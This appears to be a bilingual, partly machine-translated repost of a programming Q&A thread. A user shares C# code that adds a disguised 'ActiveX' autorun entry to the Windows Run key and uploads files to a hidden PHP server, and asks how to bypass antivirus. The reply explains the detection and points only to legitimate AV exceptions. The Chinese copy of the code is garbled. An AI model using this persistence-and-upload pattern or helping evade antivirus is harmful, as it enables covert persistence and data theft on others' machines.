注册表项由防病毒程序捕获 [英] Registry Entry Caught By The Antivirus

查看:67
本文介绍了注册表项由防病毒程序捕获的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

您好专家我正面临一个问题与我的exe



我的exe正在运行f9



但只有两个原因才能被杀毒软件bcz抓住



1:RegistryKey reg = Registry.LocalMachine.OpenSubKey(SOFTWARE \\ Microsoft \\\\\\\\\\\\\ \\\ CurrentVersion \\\\\,,真实);

reg.SetValue(ActiveX,Application.ExecutablePath.ToString());

//当我在注册表中创建一个条目



2:System.Net.WebClient Client = new System.Net.WebClient( );

Client.Headers.Add(Content-Type,binary / octet-stream);

byte [] result = Client.UploadFile(http ://#########/data/upload.php,POST,filepath);

string s = System.Text.Encoding.UTF8.GetString(结果, 0,result.Length);



//第二次将我的文件从c#client上传到php服务器

如何解决它?

并给我建议绕过防病毒

Hello experts I am facing a prob with my exe

My exe Is running f9

but caught by the Antivirus bcz of two reasons only

1 : RegistryKey reg = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
reg.SetValue("ActiveX", Application.ExecutablePath.ToString());
//when i create a entry in the registry

2: System.Net.WebClient Client = new System.Net.WebClient();
Client.Headers.Add("Content-Type", "binary/octet-stream");
byte[] result = Client.UploadFile("http://#########/data/upload.php", "POST", filepath);
string s = System.Text.Encoding.UTF8.GetString(result, 0, result.Length);

//and second when i upload my files from c# client to php server
How can i resolve it?
and give me suggestion for bypass antivirus

推荐答案

它被捕获了,因为在注册表中向自动运行添加条目对于恶意软件是常见的。



也就是说,公司开发内部使用的代码并不罕见,这些代码需要在机器启动时自动运行,因此通常会有一种方法来添加异常。 AV产品因此赢了; tf滞后某些可执行名称。如果它是一台工作计算机,请询问您的系统管理员,如果不是您;请继续深入研究AV文档或联系他们的支持。
It's caught because adding entries to the autorun in the registry is common for malware.

That said, it's not not uncommon for companies to develop code for internal use that need to autorun when a machine starts, so there's usually a method to add exceptions to the AV product so it won;t flag certain executable names. If it;s a work computer, ask your system administrators, if not you;re stuck with digging into the AV documentation or contacting their support.


这篇关于注册表项由防病毒程序捕获的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆